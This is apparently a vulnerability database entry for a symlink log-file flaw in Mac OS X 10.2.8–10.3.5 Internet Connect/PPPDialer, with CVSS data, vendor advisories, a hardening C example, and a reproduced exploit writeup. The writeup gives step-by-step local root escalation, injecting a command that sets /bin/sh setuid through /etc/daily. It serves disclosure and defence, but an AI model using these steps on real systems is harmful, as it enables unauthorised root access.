Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:39:31

[Original] PPPDialer for Mac OS X 10.2.8 through 10.3.5 allows local users to overwrite system files via a symlink attack on PPPDialer log files.

[CNNVD] Apple PPPDialer Insecure Log File Creation Symbolic Link Vulnerability (CNNVD-200412-633)

        PPPDialer in Mac OS X 10.2.8 through 10.3.5 contains a vulnerability. A local user can overwrite system files via a symlink attack on the PPPDialer log file.

- CVSS (Base Score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected platforms and products)

cpe:/o:apple:mac_os_x:10.3.1  Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x:10.3.3  Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x:10.3.2  Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x:10.3.5  Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x:10.3    Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x:10.2.8  Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x:10.3.4  Apple Mac OS X 10.3.4

- OVAL (Technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(PATCH)  XF  macosx-pppdialer-symlink(17298)
(PATCH)  BID  11139
(PATCH)  SECTRACK  1011175

- Vulnerability information

Apple PPPDialer Insecure Log File Creation Symbolic Link Vulnerability
Low severity  Access Validation Error
2004-12-31 00:00:00 2005-10-20 00:00:00
        PPPDialer in Mac OS X 10.2.8 through 10.3.5 contains a vulnerability. A local user can overwrite system files via a symlink attack on the PPPDialer log file.

- Advisories and patches

        Apple has released an advisory (APPLE-SA-0024-09-07) along with fixes to address this, and many other issues. Please see the referenced advisory for further information.
        Apple Mac OS X 10.2.8
        Apple Mac OS X Server 10.2.8
        Apple Mac OS X 10.3.4
        Apple Mac OS X Server 10.3.4
        Apple Mac OS X 10.3.5
        Apple Mac OS X Server 10.3.5

- Vulnerability information (367)

Mac OS X Panther Internet Connect Local Root Exploit (EDBID:367)
osX local
2004-07-28 Verified
0 B-r00t
N/A
Date: 25.07.2004
Author: B-r00t. 2004.
Email: B-r00t <br00t blueyonder co uk>

Vendor: Apple

System: OSX Panther (Possibly Previous Versions).

Application: Internet

Tested: Panther 10.3.4 (Internet Connect v1.3)

Problem: Internet Connect allows any file on the file
system to be altered.

Status: 0day! - Temporary Fix Included.

Apple's Internet Connect application creates a
'ppp.log' file in '/tmp/'. If the file already
exists it is opened in append mode. If it does
not exist a new file is created.

It is possible to trick Internet Connect into
appending data to any file on the filesystem by
creating a symlink file '/tmp/ppp.log' pointing
to the file to be altered.

If the file '/tmp/ppp.log' already exists, the
attack is not possible as the file is owned by
user 'root' and group 'wheel': -

$ ls -l /tmp/ppp.log
-rw-r--r-- 1 root wheel 807 24 Jul 23:44 /tmp/ppp.log

However, due to the Operating System clearing the
'/tmp' directory during system startup and also on
a regular basis due to system maintenance, it
becomes possible to form the attack as shown below:

First a file is created to represent a system file,
owned and only writable by user 'root'.

maki:~ # echo "TEST" > /etc/file_owned_by_root

maki:~ # ls -l /etc/file_owned_by_root
-rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/

maki:~ # cat /etc/file_owned_by_root

A symlink is now created in the '/tmp' directory to
point to the file to be altered. It is important to
realise that the link can be created as a non-'admin'
or non-'root' user.

maki:/tmp $ id
uid=502(br00t) gid=502(br00t) groups=502(br00t)

maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log

maki:/tmp $ ls -l ./ppp.log
lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /

Now Internet Connect is opened. Under 'configuration'
choose 'Other'. Enter some text into the 'Telephone
Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.

'Cancel' can be clicked several seconds later.

Checking the original file '/etc/file_owned_by_root'
we see the following: -

maki:~ $ cat /etc/file_owned_by_root
Sun Jul 25 00:20:42 2004 : Version 2.0
Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
Sun Jul 25 00:20:58 2004 : Serial link disconnected.

As can be seen, data has been appended to the 'protected'

Impact: It is possible for a local user to escalate their
privileges by appending data to specific system files.
In addition, a malicious user may be able to render the
machine unusable by corrupting important system files.

Exploit: This demonstration appends commands to the '/etc/daily'
file which is executed by default at 3:15AM each day.
An alternative attack might involve appending to any
of the files that are sourced at system start up such
as '/etc/rc.common'. This latter method is convenient
if the user is able to reboot the machine.

Create our link
maki:~ $ ln -s /etc/daily /tmp/ppp.log

Open Internet Connect.
Internal Modem -> Configuration -> Other

Internet Connect only allows certain characters to be
used for the telephone number. The background '&'
character allows our command string to execute amongst
the time and date strings also appended.

Telephone Number:
& cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 
sh &

Click 'Connect' ...*wait (10secs) ... 'Cancel'

Check the '/etc/daily' file.
maki:~ $ tail /etc/daily
if [ -f /etc/security ]; then
echo ""
echo "Running security:"
sh /etc/security 2>&1 | sendmail root

Sun Jul 25 03:10:11 2004 : Version 2.0
Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. 
&& cd .. && cd bin && chmod 4755 sh &
Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
Sun Jul 25 03:10:17 2004 : Serial link disconnected.

Now sit back and wait for cron to execute '/etc/daily' at 03:

maki:~ $ date
Sun Jul 25 03:13:43 CEST 2004

maki:~ $ cd /bin

maki:/bin $ ls -l sh
-r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*

maki:/bin $ date
Sun Jul 25 03:15:50 CEST 2004

maki:/bin $ ls -l sh
-rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*

maki:/bin $ sh

maki:/bin # id
uid=502(br00t) euid=0(root) gid=502(br00t) 

All that's left to do is clean up '/etc/daily' and remove the 

FIX: The following commands serve to provide a temporary fix 
Apple release an official update.

Open a terminal: /Applications/Utilities/
Gain root access using 'sudo':

maki:~ $ sudo sh

maki:~ # whoami

You can copy and paste the following commands: -

/usr/bin/touch /tmp/ppp.log
echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily
echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common

These commands ensure that a '/tmp/ppp.log' file is
present to prevent a user from creating a link as shown
above. Alternatively the line:

/usr/bin/touch /tmp/ppp.log

can be added to each file '/etc/daily' and '/etc/rc.common'
manually using an editor and root privileges.

Shoutz: Marshal-L, Ruxsaw, Haggis & Kraft.
s1, Blex & the old #cheese posse (RIP).
Maz ... Good Luck For The Wedding!

# [2004-07-28]
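The writeup above turns on one programming decision: a privileged process opens a log in a shared, world-writable directory with "create or append" semantics and follows whatever already sits at that path, so a link planted there by any local user redirects the write. The C program below is an added example, not part of the advisory and not Apple's code. It places the pattern the advisory describes (open with O_CREAT|O_APPEND, links followed) beside a hardened opener that uses O_NOFOLLOW and then checks the descriptor it actually obtained with fstat(). The scratch directory, the "protected" target file and the ppp.log link it builds are constructed for the demonstration; it never touches the real /tmp/ppp.log.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: create the log if missing, otherwise
 * append, and follow whatever already sits at the path. A symlink planted
 * there by any local user redirects the write. Returns an fd or -1. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}

/* Hardened opener: O_NOFOLLOW makes open() fail (ELOOP) when the final path
 * component is a symlink, and fstat() on the descriptor we actually got
 * rejects anything that is not a plain file owned by us with a single link.
 * Checking the open descriptor rather than the path avoids a check-then-use
 * race. Returns an fd or -1 with errno set. */
int open_log_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-contained demonstration in a scratch directory (constructed for this
 * example). Creates a "protected" target file holding "TEST\n" and a link
 * named ppp.log pointing at it, then checks that:
 *   1. the unsafe opener writes through the link and the target grows,
 *   2. the safe opener refuses the link,
 *   3. once the link is gone, the safe opener creates a fresh file normally.
 * Returns 1 when all three hold, 0 otherwise. */
int demo_symlink_log(void)
{
    char dir[] = "/tmp/pppdemo.XXXXXX";
    char local[] = "./pppdemo.XXXXXX";
    char *scratch = mkdtemp(dir);
    if (scratch == NULL)
        scratch = mkdtemp(local);   /* fall back to the working directory */
    if (scratch == NULL)
        return 0;

    char target[300], link[300];
    struct stat st;
    int result = 0, fd;
    snprintf(target, sizeof target, "%s/target", scratch);
    snprintf(link, sizeof link, "%s/ppp.log", scratch);

    fd = open(target, O_WRONLY | O_CREAT, 0644);
    if (fd < 0 || write(fd, "TEST\n", 5) != 5 || close(fd) != 0)
        goto cleanup;
    if (symlink(target, link) != 0)
        goto cleanup;

    /* 1. unsafe open follows the link: 5 + 8 bytes end up in the target */
    fd = open_log_unsafe(link);
    if (fd < 0 || write(fd, "Dialing\n", 8) != 8 || close(fd) != 0)
        goto cleanup;
    int followed = (stat(target, &st) == 0 && st.st_size == 13);

    /* 2. safe open refuses the link */
    fd = open_log_safe(link);
    int refused = (fd < 0);
    if (fd >= 0)
        close(fd);

    /* 3. safe open works once nothing hostile sits at the path */
    unlink(link);
    fd = open_log_safe(link);
    int created = (fd >= 0 && write(fd, "ok\n", 3) == 3);
    if (fd >= 0)
        close(fd);

    result = followed && refused && created;
cleanup:
    unlink(link);
    unlink(target);
    rmdir(scratch);
    return result;
}

int main(void)
{
    printf("symlink follow/refuse demo: %s\n",
           demo_symlink_log() ? "ok" : "FAILED");
    return 0;
}
```

O_NOFOLLOW only covers the last path component, so a link in a parent directory is still followed; the durable fix is to keep the log out of a world-writable directory altogether (a root-owned directory with a fixed mode, or a per-user directory), which also removes the dependency the advisory's touch-based workaround has on the placeholder file being recreated every time /tmp is cleared.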

- Vulnerability information

Apple Mac OS X Local Privilege Escalation
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- Vulnerability description

Apple's Internet Connect application contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a user creates a specially crafted symlink against the Internet Connect ppp.log file. This flaw may lead to a loss of integrity.

- Timeline

2004-07-25 Unknown
2004-07-25 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, B-r00t has released an unofficial patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Apple PPPDialer Insecure Log File Creation Symbolic Link Vulnerability
Access Validation Error 11139
No Yes
2004-09-07 12:00:00 2009-07-12 07:06:00
This vulnerability was announced in a vendor advisory.

- Affected program versions

Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.2.8

- Vulnerability discussion

The Apple PPPDialer utility is reported to contain an insecure log file creation vulnerability. The result of this is that log files created by the application are created in a world-writable location.

A local attacker may possibly exploit this vulnerability to execute symbolic link file overwrite attacks.

Privilege escalation may be possible using this method of attack, if the attacker can control the data that is being written to the target file.

- Exploit

No exploit is required.

- Solution

Apple has released an advisory (APPLE-SA-0024-09-07) along with fixes to address this, and many other issues. Please see the referenced advisory for further information.

Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X 10.3.4

Apple Mac OS X Server 10.3.4

Apple Mac OS X 10.3.5

Apple Mac OS X Server 10.3.5

- References